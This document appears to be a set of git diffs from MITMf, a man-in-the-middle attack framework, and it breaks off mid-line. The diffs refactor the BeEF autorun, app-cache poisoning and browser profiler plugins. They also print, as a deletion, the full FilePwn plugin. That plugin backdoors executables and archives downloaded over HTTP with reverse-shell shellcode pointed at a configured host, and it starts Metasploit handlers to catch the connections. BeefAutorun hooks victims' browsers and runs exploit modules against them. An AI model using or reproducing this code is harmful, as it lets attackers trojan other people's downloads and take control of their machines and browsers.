b/plugins/AppCachePoison.py index 13985a1..8d81dc8 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -29,6 +29,7 @@ import sys from plugins.plugin import Plugin from datetime import date from core.sslstrip.URLMonitor import URLMonitor +from core.configwatcher import ConfigWatcher mitmf_logger = logging.getLogger('mitmf') @@ -47,18 +48,16 @@ class AppCachePlugin(Plugin): self.urlMonitor.setAppCachePoisoning() - try: - self.config = options.configfile['AppCachePoison'] - except Exception, e: - sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e)) - def handleResponse(self, request, data): + self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request url = request.client.uri req_headers = request.client.getAllHeaders() headers = request.client.responseHeaders ip = request.client.getClientIP() + ######################################################################### + if "enable_only_in_useragents" in self.config: regexp = self.config["enable_only_in_useragents"] if regexp and not re.search(regexp,req_headers["user-agent"]): diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 59fceeb..39bed82 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -24,16 +24,15 @@ import json import threading from core.beefapi.beefapi import BeefAPI +from core.configwatcher import ConfigWatcher +from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject from time import sleep -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - mitmf_logger = logging.getLogger('mitmf') -class BeefAutorun(Inject, Plugin): +class BeefAutorun(Inject, Plugin, ConfigWatcher): name = "BeEFAutorun" optname = "beefauto" desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" @@ -43,95 +42,90 @@ class BeefAutorun(Inject, Plugin): has_opts = False def initialize(self, options): - self.options = options - self.ip_address = options.ip_address - - try: - beefconfig = options.configfile['MITMf']['BeEF'] - except Exception, e: - sys.exit("[-] Error parsing BeEF options in config file: " + str(e)) - - try: - userconfig = options.configfile['BeEFAutorun'] - except Exception, e: - sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e)) - - self.Mode = userconfig['mode'] - self.All_modules = userconfig["ALL"] - self.Targeted_modules = userconfig["targets"] + self.options = options + self.ip_address = SystemConfig.getIP(options.interface) Inject.initialize(self, options) - self.black_ips = [] - self.html_payload = '' % (self.ip_address, beefconfig['beefport']) - - beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - self.tree_output.append("Mode: %s" % self.Mode) + self.onConfigChange() - t = threading.Thread(name="autorun", target=self.autorun, args=(beef,)) + t = threading.Thread(name="autorun", target=self.autorun, args=()) t.setDaemon(True) t.start() - def autorun(self, beef): + def onConfigChange(self): + + beefconfig = self.config['MITMf']['BeEF'] + + self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) + + self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) + if not self.beef.login(beefconfig['user'], beefconfig['pass']): + sys.exit("[-] Error logging in to BeEF!") + + self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) + + def autorun(self): already_ran = [] already_hooked = [] while True: - sessions = beef.sessions_online() + mode = self.config['BeEFAutorun']['mode'] + sessions = self.beef.sessions_online() if (sessions is not None and len(sessions) > 0): for session in sessions: if session not in already_hooked: - info = beef.hook_info(session) - mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os'])) + info = self.beef.hook_info(session) + mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) already_hooked.append(session) self.black_ips.append(str(info['ip'])) - if self.Mode == 'oneshot': + if mode == 'oneshot': if session not in already_ran: - self.execModules(session, beef) + self.execModules(session) already_ran.append(session) - elif self.Mode == 'loop': - self.execModules(session, beef) + elif mode == 'loop': + self.execModules(session) sleep(10) else: sleep(1) - def execModules(self, session, beef): - session_info = beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] + def execModules(self, session): + session_info = self.beef.hook_info(session) + session_ip = session_info['ip'] + hook_browser = session_info['name'] + hook_os = session_info['os'] + all_modules = self.config['BeEFAutorun']["ALL"] + targeted_modules = self.config['BeEFAutorun']["targets"] - if len(self.All_modules) > 0: - mitmf_logger.info("%s >> sending generic modules" % session_ip) - for module, options in self.All_modules.iteritems(): - mod_id = beef.module_id(module) - resp = beef.module_run(session, mod_id, json.loads(options)) + if len(all_modules) > 0: + mitmf_logger.info("{} >> sending generic modules".format(session_ip)) + for module, options in all_modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': - mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) else: - mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) sleep(0.5) - mitmf_logger.info("%s >> sending targeted modules" % session_ip) - for os in self.Targeted_modules: + mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) + for os in targeted_modules: if (os in hook_os) or (os == hook_os): - browsers = self.Targeted_modules[os] + browsers = targeted_modules[os] if len(browsers) > 0: for browser in browsers: if browser == hook_browser: - modules = self.Targeted_modules[os][browser] + modules = targeted_modules[os][browser] if len(modules) > 0: for module, options in modules.iteritems(): - mod_id = beef.module_id(module) - resp = beef.module_run(session, mod_id, json.loads(options)) + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': - mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) else: - mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 8f3afa1..44ea3c5 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -54,7 +54,7 @@ class BrowserProfiler(Inject, Plugin): if self.dic_output['plugin_list'] > 0: self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') pretty_output = pformat(self.dic_output) - mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output)) + mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) def get_payload(self): payload = """'.format(self.ip_address, beefconfig['beefport']) - - self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - - self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) - - def autorun(self): - already_ran = [] - already_hooked = [] - - while True: - mode = self.config['BeEFAutorun']['mode'] - sessions = self.beef.sessions_online() - if (sessions is not None and len(sessions) > 0): - for session in sessions: - - if session not in already_hooked: - info = self.beef.hook_info(session) - mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) - already_hooked.append(session) - self.black_ips.append(str(info['ip'])) - - if mode == 'oneshot': - if session not in already_ran: - self.execModules(session) - already_ran.append(session) - - elif mode == 'loop': - self.execModules(session) - sleep(10) - - else: - sleep(1) - - def execModules(self, session): - session_info = self.beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] - all_modules = self.config['BeEFAutorun']["ALL"] - targeted_modules = self.config['BeEFAutorun']["targets"] - - if len(all_modules) > 0: - mitmf_logger.info("{} >> sending generic modules".format(session_ip)) - for module, options in all_modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) - - mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) - for os in targeted_modules: - if (os in hook_os) or (os == hook_os): - browsers = targeted_modules[os] - if len(browsers) > 0: - for browser in browsers: - if browser == hook_browser: - modules = targeted_modules[os][browser] - if len(modules) > 0: - for module, options in modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py deleted file mode 100644 index 44ea3c5..0000000 --- a/plugins/BrowserProfiler.py +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -from pprint import pformat -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class BrowserProfiler(Inject, Plugin): - name = "Browser Profiler" - optname = "browserprofiler" - desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() - self.dic_output = {} # so other plugins can access the results - - def post2dict(self, post): #converts the ajax post to a dic - dict = {} - for line in post.split('&'): - t = line.split('=') - dict[t[0]] = t[1] - return dict - - def sendPostData(self, request): - #Handle the plugin output - if 'clientprfl' in request.uri: - self.dic_output = self.post2dict(request.postData) - self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client - if self.dic_output['plugin_list'] > 0: - self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') - pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) - - def get_payload(self): - payload = """""" - - return payload diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index b912244..c039f61 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -20,7 +20,6 @@ from plugins.plugin import Plugin - class CacheKill(Plugin): name = "CacheKill" optname = "cachekill" diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py deleted file mode 100644 index ebe6fbc..0000000 --- a/plugins/FilePwn.py +++ /dev/null @@ -1,652 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' -# -# Author Joshua Pitts the.midnite.runr 'at' gmail com -# -# Copyright (c) 2013-2014, Joshua Pitts -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without modification, -# are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# 3. Neither the name of the copyright holder nor the names of its contributors -# may be used to endorse or promote products derived from this software without -# specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -# -# Tested on Kali-Linux. - -import sys -import os -import pefile -import zipfile -import logging -import shutil -import random -import string -import tarfile -import multiprocessing -import threading - -from libs.bdfactory import pebin -from libs.bdfactory import elfbin -from libs.bdfactory import machobin -from core.msfrpc import Msfrpc -from core.configwatcher import ConfigWatcher -from plugins.plugin import Plugin -from tempfile import mkstemp -from configobj import ConfigObj - -mitmf_logger = logging.getLogger('mitmf') - -class FilePwn(Plugin, ConfigWatcher): - name = "FilePwn" - optname = "filepwn" - desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - - self.patched = multiprocessing.Queue() - - #FOR FUTURE USE - self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] - - #FOR FUTURE USE - self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] - - #USED NOW - self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, - 'pe': {'number': 'MZ', 'offset': 0}, - 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, - 'bz': {'number': 'BZ', 'offset': 0}, - 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, - 'tar': {'number': 'ustar', 'offset': 257}, - 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, - 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, - 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, - } - - #NOT USED NOW - #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - - #FilePwn options - self.userConfig = self.config['FilePwn'] - self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] - self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] - self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] - self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] - self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] - self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] - self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] - self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] - self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] - self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] - self.zipblacklist = self.userConfig['ZIP']['blacklist'] - self.tarblacklist = self.userConfig['TAR']['blacklist'] - - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] - - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - self.tree_output.append("Setting up Metasploit payload handlers") - jobs = msf.call('job.list') - for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: - cmd = "use exploit/multi/handler\n" - cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) - cmd += "set LHOST {}\n".format(config["HOST"]) - cmd += "set LPORT {}\n".format(config["PORT"]) - cmd += "exploit -j\n" - - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - - def onConfigChange(self): - self.initialize(self.options) - - def convert_to_Bool(self, aString): - if aString.lower() == 'true': - return True - elif aString.lower() == 'false': - return False - elif aString.lower() == 'none': - return None - - def bytes_have_format(self, bytess, formatt): - number = self.magicNumbers[formatt] - if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: - return True - return False - - def binaryGrinder(self, binaryFile): - """ - Feed potential binaries into this function, - it will return the result PatchedBinary, False, or None - """ - - with open(binaryFile, 'r+b') as f: - binaryTMPHandle = f.read() - - binaryHeader = binaryTMPHandle[:4] - result = None - - try: - if binaryHeader[:2] == 'MZ': # PE/COFF - pe = pefile.PE(data=binaryTMPHandle, fast_load=True) - magic = pe.OPTIONAL_HEADER.Magic - machineType = pe.FILE_HEADER.Machine - - #update when supporting more than one arch - if (magic == int('20B', 16) and machineType == 0x8664 and - self.WindowsType.lower() in ['all', 'x64']): - add_section = False - cave_jumping = False - if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx64['SHELL'], - HOST=self.WindowsIntelx64['HOST'], - PORT=int(self.WindowsIntelx64['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif (machineType == 0x14c and - self.WindowsType.lower() in ['all', 'x86']): - add_section = False - cave_jumping = False - #add_section wins for cave_jumping - #default is single for BDF - if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx86['SHELL'], - HOST=self.WindowsIntelx86['HOST'], - PORT=int(self.WindowsIntelx86['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF - - targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - if targetFile.class_type == 0x1: - #x86CPU Type - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx86['SHELL'], - HOST=self.LinuxIntelx86['HOST'], - PORT=int(self.LinuxIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - elif targetFile.class_type == 0x2: - #x64 - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx64['SHELL'], - HOST=self.LinuxIntelx64['HOST'], - PORT=int(self.LinuxIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho - targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE - - if targetFile.FAT_FILE is True: - if self.FatPriority == 'x86': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif self.FatPriority == 'x64': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - self.patched.put(result) - return - - except Exception as e: - print 'Exception', str(e) - mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) - return None - - def tar_files(self, aTarFileBytes, formatt): - "When called will unpack and edit a Tar File and return a tar file" - - print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' - - if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): - print "[!] TarFile over allowed size" - mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) - self.patched.put(aTarFileBytes) - return - - with tempfile.NamedTemporaryFile() as tarFileStorage: - tarFileStorage.write(aTarFileBytes) - tarFileStorage.flush() - - if not tarfile.is_tarfile(tarFileStorage.name): - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - compressionMode = ':' - if formatt == 'gz': - compressionMode = ':gz' - if formatt == 'bz': - compressionMode = ':bz2' - - tarFile = None - try: - tarFileStorage.seek(0) - tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) - except tarfile.ReadError: - pass - - if tarFile is None: - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - print '[*] Tar file contents and info:' - print '[*] Compression:', formatt - - members = tarFile.getmembers() - for info in members: - print "\t", info.name, info.mtime, info.size - - newTarFileStorage = tempfile.NamedTemporaryFile() - newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) - - patchCount = 0 - wasPatched = False - - for info in members: - print "[*] >>> Next file in tarfile:", info.name - - if not info.isfile(): - print info.name, 'is not a file' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - if info.size >= long(self.FileSizeMax): - print info.name, 'is too big' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - # Check against keywords - keywordCheck = False - - if type(self.tarblacklist) is str: - if self.tarblacklist.lower() in info.name.lower(): - keywordCheck = True - - else: - for keyword in self.tarblacklist: - if keyword.lower() in info.name.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Tar blacklist enforced!" - mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) - continue - - # Try to patch - extractedFile = tarFile.extractfile(info) - - if patchCount >= int(self.userConfig['TAR']['patchCount']): - newTarFile.addfile(info, extractedFile) - else: - # create the file on disk temporarily for fileGrinder to run on it - with tempfile.NamedTemporaryFile() as tmp: - shutil.copyfileobj(extractedFile, tmp) - tmp.flush() - patchResult = self.binaryGrinder(tmp.name) - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(tmp.name) - print "[*] Patching complete, adding to tar file." - info.size = os.stat(file2).st_size - with open(file2, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - with open(tmp.name, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) - if patchCount == int(self.userConfig['TAR']['patchCount']): - mitmf_logger.info("Met Tar config patchCount limit.") - - # finalize the writing of the tar file first - newTarFile.close() - - # then read the new tar file into memory - newTarFileStorage.seek(0) - ret = newTarFileStorage.read() - newTarFileStorage.close() # it's automatically deleted - - if wasPatched is False: - # If nothing was changed return the original - print "[*] No files were patched forwarding original file" - self.patched.put(aTarFileBytes) - return - else: - self.patched.put(ret) - return - - def zip_files(self, aZipFile): - "When called will unpack and edit a Zip File and return a zip file" - - print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' - - if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): - print "[!] ZipFile over allowed size" - mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) - self.patched.put(aZipFile) - return - - tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) - tmpDir = '/tmp/' + tmpRan - tmpFile = '/tmp/' + tmpRan + '.zip' - - os.mkdir(tmpDir) - - with open(tmpFile, 'w') as f: - f.write(aZipFile) - - zippyfile = zipfile.ZipFile(tmpFile, 'r') - - #encryption test - try: - zippyfile.testzip() - - except RuntimeError as e: - if 'encrypted' in str(e): - mitmf_logger.info('Encrypted zipfile found. Not patching.') - return aZipFile - - print "[*] ZipFile contents and info:" - - for info in zippyfile.infolist(): - print "\t", info.filename, info.date_time, info.file_size - - zippyfile.extractall(tmpDir) - - patchCount = 0 - - wasPatched = False - - for info in zippyfile.infolist(): - print "[*] >>> Next file in zipfile:", info.filename - - if os.path.isdir(tmpDir + '/' + info.filename) is True: - print info.filename, 'is a directory' - continue - - #Check against keywords - keywordCheck = False - - if type(self.zipblacklist) is str: - if self.zipblacklist.lower() in info.filename.lower(): - keywordCheck = True - - else: - for keyword in self.zipblacklist: - if keyword.lower() in info.filename.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Zip blacklist enforced!" - mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) - continue - - patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) - - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(info.filename) - print "[*] Patching complete, adding to zip file." - shutil.copyfile(file2, tmpDir + '/' + info.filename) - mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) - - print '-' * 10 - - if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. - mitmf_logger.info("Met Zip config patchCount limit.") - break - - zippyfile.close() - - zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) - - print "[*] Writing to zipfile:", tmpFile - - for base, dirs, files in os.walk(tmpDir): - for afile in files: - filename = os.path.join(base, afile) - print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') - zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) - - zipResult.close() - #clean up - shutil.rmtree(tmpDir) - - with open(tmpFile, 'rb') as f: - tempZipFile = f.read() - os.remove(tmpFile) - - if wasPatched is False: - print "[*] No files were patched forwarding original file" - self.patched.put(aZipFile) - return - else: - self.patched.put(tempZipFile) - return - - def handleResponse(self, request, data): - - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() - - if content_header in 